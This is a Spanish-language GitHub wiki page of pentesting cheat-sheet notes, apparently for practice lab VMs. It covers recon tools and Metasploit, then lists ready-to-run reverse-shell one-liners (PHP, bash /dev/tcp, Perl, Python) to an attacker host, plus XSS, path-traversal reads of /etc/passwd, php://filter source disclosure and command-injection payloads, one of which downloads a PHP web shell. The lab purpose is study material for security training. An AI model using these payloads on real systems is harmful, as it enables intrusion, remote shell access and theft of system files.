Skip to content
danielcastropalomares edited this page May 26, 2019 · 77 revisions

WALKTHROUGHS

En este apartado se detallara el procedimiento aplicado para realizar el pentesting en cada VM:

Utilidades

snmpcheck

Muestras la información obtenida por SNMP de forma amigable

snmpcheck -t x.x.x.x

msfconsole

Primero tendremos que iniciar la BBD postgresql:

/etc/init.d/postgresql start

Ahora ya podemos entrar dentro de la consola:

msfconsole

Para buscar y utilizar un exploit:

search TEST

exploit TEST

Si queremos saber que variables podemos utilizar en el exploit:

info

SET RHOST x.x.x.x

reverse msfconsole

theharvester

Obtener información de un dominio desde diferentes motores de búsqueda:

theharvester -d test.com -l 200 -b google

DNSenum

Mostrar toda la información posible de un dominio:

dnsenum --enum test.com

Bruteforce Web directorios

Vulnerabilidades web

nikto -C all -host x.x.x.x

Wordpress scanner

wpscan --url http://IP/ --enumerate p wpscan --enumerate u --disable-tls-checks --url https://IP:12380/blogblog

Binarios SUID

Buscar archivos con SUID configurado:

find / -perm -u=s -type f 2>/dev/null

Reverse shell

Maquina atacante:

nc -vlp 8080

Maquina victima

php -r '$sock=fsockopen("attackerip",8080);exec("/bin/sh -i <&3 >&3 2>&3");'`
bash -i >& /dev/tcp/attackerip/8080 0>&1`
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
    perl -e 'use Socket;$i="172.31.255.142";$p=8085;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerIP",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Una vez obtenida la shell:

python -c 'import pty;pty.spawn("/bin/bash")'
    <Ctrl+z> bg
    stty raw -echo
    fg
    reset

Web for pentester

Pruebas extraídas de la web: https://pentesterlab.com/exercises/web_for_pentester

XSS

  http://172.31.255.111/xss/example1.php?name=%3Cscript%3Ealert(%22HACKER%22)%3C/script%3E

File include

 http://172.31.255.111/fileincl/example1.php?page=../../../../etc/passwd
 http://172.31.255.111/fileincl/example1.php?page=../../../../etc/passwd%00
 http://xqi.cc/index.php?m=php://filter/convert.base64-encode/resource=index

Command exec

http://172.31.255.111/commandexec/example1.php?ip=127.0.0.1|cat /etc/passwd
http://172.31.255.111/commandexec/example1.php?ip=127.0.0.1|wget –no-check-certificate https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
http://172.31.255.111/commandexec/example2.php?ip=8.8.8.8%0aid
Clone this wiki locally